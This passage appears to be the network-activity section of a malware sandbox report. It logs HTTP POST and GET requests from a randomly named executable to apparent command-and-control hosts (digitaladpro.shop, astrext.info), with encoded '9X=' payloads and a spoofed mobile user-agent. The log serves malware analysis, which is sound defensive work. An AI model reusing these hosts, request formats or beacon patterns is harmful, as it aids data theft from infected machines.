                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                          Oct 23, 2024 17:13:23.848937035 CEST537INData Raw: 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d
                                                                                                                                                                          Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          7192.168.2.549984142.250.184.211802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:13:25.555887938 CEST1821OUTPOST /ggfl/ HTTP/1.1
                                                                                                                                                                          Host: www.digitaladpro.shop
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 1239
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.digitaladpro.shop
                                                                                                                                                                          Referer: http://www.digitaladpro.shop/ggfl/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 76 4d 61 72 71 69 41 6e 50 65 4c 56 78 50 6b 38 46 46 69 62 78 2b 63 35 37 47 41 41 66 78 64 35 44 4e 59 78 4b 6b 47 53 67 33 44 4f 6b 70 4b 37 72 59 35 55 37 70 31 55 76 74 4d 56 52 4b 48 6c 30 6f 6a 43 54 33 46 72 45 41 32 57 54 49 4c 38 63 51 79 4e 34 4d 70 72 6a 65 68 6a 62 44 6a 34 66 79 57 35 76 47 37 68 2b 4f 2f 4a 79 46 6d 50 73 6e 36 45 2f 35 4f 44 7a 53 41 6a 6a 47 41 41 72 73 4a 68 33 55 6d 72 48 69 2f 6f 55 57 75 56 70 65 54 56 54 38 61 4e 4c 61 72 78 6e 35 7a 4d 70 6e 39 58 77 65 76 72 6d 4d 6f 66 52 34 34 32 72 47 41 65 48 43 36 48 38 2f 52 58 65 6d 5a 65 52 74 38 6d 2f 2b 71 76 6b 72 4f 46 71 67 77 47 62 50 74 38 32 51 33 78 4b 58 58 67 72 37 36 79 6c 54 53 46 58 72 59 37 6f 79 62 4d 51 56 51 6a 72 74 46 61 42 31 62 74 45 48 6b 4d 73 59 64 79 6c 37 37 49 50 37 47 69 6c 6a 6b 71 58 31 6e 4a 46 48 61 59 52 6e 63 33 7a 6b 55 43 77 4b 56 33 74 74 31 72 48 66 76 77 75 47 57 65 5a 45 71 74 4f 32 32 50 75 78 44 61 35 4e 4c 7a 47 31 6a 49 74 70 39 4d 76 46 6a 50 39 76 65 70 44 7a 45 [TRUNCATED]
                                                                                                                                                                          Data Ascii: 9X=vMarqiAnPeLVxPk8FFibx+c57GAAfxd5DNYxKkGSg3DOkpK7rY5U7p1UvtMVRKHl0ojCT3FrEA2WTIL8cQyN4MprjehjbDj4fyW5vG7h+O/JyFmPsn6E/5ODzSAjjGAArsJh3UmrHi/oUWuVpeTVT8aNLarxn5zMpn9XwevrmMofR442rGAeHC6H8/RXemZeRt8m/+qvkrOFqgwGbPt82Q3xKXXgr76ylTSFXrY7oybMQVQjrtFaB1btEHkMsYdyl77IP7GiljkqX1nJFHaYRnc3zkUCwKV3tt1rHfvwuGWeZEqtO22PuxDa5NLzG1jItp9MvFjP9vepDzEMt9KyGpoLWvgDXd9w03z5PnuPwW0I56XwrqEtwuNBSNYU7hS6HOSaN0xfGeYHYzck037puB/VJ9aokXQXUTxzBupTwMr7P9nwWf6bgDkCMv+aQXZj7n40WbS+NH/y9r5B0HLR8vuaC+MRPgKqiiYe4ClVuZ/m4HWTP5NP/+udsQcCAN7hurmlRr0F3PIjRGIIoi9jGMPYjBBlfoDl0zMeUl+kJmBdKq6a69CYrV/MjsBuJUm+D5mVDBxS6YG24UMbYaO4xWS29NjtffetlLGCzyyFHLTeI8xR00WMU8yOw0qb1NX95+/qn1LyQ0es7KayLwM6TjhXcsyebpSSYiVWzouScHOiPcWZBj0zlsdE9iHwXIQrXg4LFZlAmWloSn3HJnwkVRbSwPPvb2iorH+P/MY3BnX8qYaNGFxN4Fgr/xmHKiyQ1yfbHHW2NlIFmZuV6RVviGJjabPlXtsLxN4J26Bo2Ce2uwwqFUnH5wkP5UGxPIhfBaYG4rE7kHkKKZ+XKXPgFZLz/y/mAtfmBT1/mh6M9jGt6gkO3Xp+WULCWwv//HmuK8htUaLOz9fx9Kux83+6qN4xh4r12BuyY3uUHPWiY/ks03eQsDz09dL/CPf/jkhmh9xuQHEnZY4e5f/KHZlwWbJCz2OSQ3INWm4HlrC0gq1GZnZuV [TRUNCATED]
                                                                                                                                                                          Oct 23, 2024 17:13:26.391789913 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:13:26 GMT
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Server: ghs
                                                                                                                                                                          Content-Length: 1566
                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                          Oct 23, 2024 17:13:26.391808987 CEST537INData Raw: 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d
                                                                                                                                                                          Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          8192.168.2.549985142.250.184.211802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:13:28.100553989 CEST525OUTGET /ggfl/?9X=iOyLpSsIOe7f6PU9BDul8aQY6xklT3REN+MLB2il0BbqrI6gnMpikIpJ6fgqZdrZw5fVWykdA1u8KoaFdWGY1+UrqNNya3HsbH6inHiT0cPHyFCdnV+w+9PZyCgPyXdb0A==&1BSHu=OBVxGh8PUTflSv4p HTTP/1.1
                                                                                                                                                                          Host: www.digitaladpro.shop
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Connection: close
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Oct 23, 2024 17:13:28.962552071 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:13:28 GMT
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Server: ghs
                                                                                                                                                                          Content-Length: 1729
                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                          Oct 23, 2024 17:13:28.962616920 CEST700INData Raw: 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d
                                                                                                                                                                          Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          9192.168.2.549986217.160.0.132802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:13:34.151000977 CEST769OUTPOST /igvi/ HTTP/1.1
                                                                                                                                                                          Host: www.astrext.info
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 203
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.astrext.info
                                                                                                                                                                          Referer: http://www.astrext.info/igvi/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 34 62 54 59 57 35 58 66 64 69 72 75 68 63 79 4e 79 47 37 41 32 71 4f 5a 61 41 4f 51 47 6e 54 69 51 70 62 53 41 71 59 32 34 63 6d 77 52 7a 4e 53 73 30 36 6e 57 50 70 51 70 76 6c 58 4a 4c 53 6f 53 78 68 54 4f 68 39 4b 7a 55 64 57 4c 68 44 30 69 30 75 51 55 4f 68 6d 61 6a 4d 7a 47 69 74 74 68 2b 30 6d 71 6b 54 55 74 79 46 64 48 32 6e 56 61 4c 7a 47 4a 35 55 75 45 70 73 4b 70 48 32 78 69 50 66 33 4b 2f 51 76 36 66 52 69 64 44 4b 65 53 36 59 6d 6d 73 53 39 74 37 30 54 72 54 4b 31 36 39 63 44 62 47 4d 63 39 38 47 75 53 39 48 34 6c 69 31 52 35 52 43 64 56 4a 51 75 6c 6a 63 74 77 32 51 47 46 55 41 3d
                                                                                                                                                                          Data Ascii: 9X=4bTYW5XfdiruhcyNyG7A2qOZaAOQGnTiQpbSAqY24cmwRzNSs06nWPpQpvlXJLSoSxhTOh9KzUdWLhD0i0uQUOhmajMzGitth+0mqkTUtyFdH2nVaLzGJ5UuEpsKpH2xiPf3K/Qv6fRidDKeS6YmmsS9t70TrTK169cDbGMc98GuS9H4li1R5RCdVJQuljctw2QGFUA=
                                                                                                                                                                          Oct 23, 2024 17:13:34.980834961 CEST780INHTTP/1.1 404 Not Found
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:13:34 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          X-Frame-Options: deny
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          Data Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 [TRUNCATED]
                                                                                                                                                                          Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          10192.168.2.549987217.160.0.132802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:13:36.697195053 CEST789OUTPOST /igvi/ HTTP/1.1
                                                                                                                                                                          Host: www.astrext.info
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 223
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.astrext.info
                                                                                                                                                                          Referer: http://www.astrext.info/igvi/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 34 62 54 59 57 35 58 66 64 69 72 75 67 35 69 4e 77 6c 44 41 2f 71 4f 59 44 77 4f 51 4e 48 54 2b 51 70 58 53 41 6f 31 70 37 75 79 77 53 52 56 53 74 33 69 6e 61 76 70 51 78 66 6b 54 57 62 54 46 53 78 74 74 4f 6b 56 4b 7a 55 4a 57 4c 67 7a 30 2b 57 47 58 56 65 68 65 53 44 4d 4c 4a 43 74 74 68 2b 30 6d 71 67 7a 2b 74 32 52 64 48 46 2f 56 49 61 7a 4a 50 4a 55 70 54 5a 73 4b 2b 58 32 31 69 50 66 5a 4b 36 49 56 36 64 5a 69 64 48 61 65 53 76 73 6c 38 38 53 2f 6a 62 31 51 6c 51 6a 68 34 37 55 35 59 46 4a 69 39 2f 53 62 58 4c 32 53 2f 41 39 35 71 78 75 6c 46 61 59 5a 30 54 39 45 71 56 41 32 62 44 57 44 31 6e 34 41 33 76 4f 32 34 55 2f 58 55 66 59 67 6c 68 38 79
                                                                                                                                                                          Data Ascii: 9X=4bTYW5Xfdirug5iNwlDA/qOYDwOQNHT+QpXSAo1p7uywSRVSt3inavpQxfkTWbTFSxttOkVKzUJWLgz0+WGXVeheSDMLJCtth+0mqgz+t2RdHF/VIazJPJUpTZsK+X21iPfZK6IV6dZidHaeSvsl88S/jb1QlQjh47U5YFJi9/SbXL2S/A95qxulFaYZ0T9EqVA2bDWD1n4A3vO24U/XUfYglh8y
                                                                                                                                                                          Oct 23, 2024 17:13:37.543494940 CEST780INHTTP/1.1 404 Not Found
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:13:37 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          X-Frame-Options: deny
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          Data Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 [TRUNCATED]
                                                                                                                                                                          Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          11192.168.2.549988217.160.0.132802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:13:39.247639894 CEST1806OUTPOST /igvi/ HTTP/1.1
                                                                                                                                                                          Host: www.astrext.info
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 1239
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.astrext.info
                                                                                                                                                                          Referer: http://www.astrext.info/igvi/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 34 62 54 59 57 35 58 66 64 69 72 75 67 35 69 4e 77 6c 44 41 2f 71 4f 59 44 77 4f 51 4e 48 54 2b 51 70 58 53 41 6f 31 70 37 76 4b 77 52 6b 4a 53 73 58 65 6e 62 76 70 51 76 76 6b 51 57 62 54 39 53 78 45 71 4f 6b 52 77 7a 57 78 57 52 43 72 30 79 79 53 58 63 65 68 65 65 6a 4d 77 47 69 74 64 68 2b 6c 68 71 6b 58 2b 74 32 52 64 48 45 50 56 59 37 7a 4a 55 4a 55 75 45 70 73 47 70 48 32 4e 69 50 47 6b 4b 37 5a 6f 36 4f 68 69 64 6e 4b 65 56 5a 77 6c 6b 73 53 78 32 62 31 79 6c 51 2f 58 34 36 39 43 59 47 56 59 39 2f 36 62 58 50 57 4c 36 55 78 45 35 69 75 37 41 59 52 34 71 44 39 69 71 46 55 46 52 6a 71 33 34 45 63 74 77 76 32 7a 39 55 79 6e 4b 4f 49 46 79 57 74 34 54 2f 51 52 54 6e 63 55 4b 35 57 67 58 6c 47 45 68 53 50 44 30 66 6e 62 47 66 77 50 75 75 74 73 43 66 57 34 38 53 53 58 5a 4f 71 42 55 52 33 71 64 35 6e 63 73 67 32 49 51 39 2b 38 44 32 56 41 4b 6c 4a 36 46 58 51 35 6c 75 5a 39 49 69 68 35 56 48 42 53 4f 32 74 36 35 30 58 50 39 49 70 53 63 4e 6c 6d 54 79 66 4c 66 34 43 4c 64 36 55 61 79 52 38 [TRUNCATED]
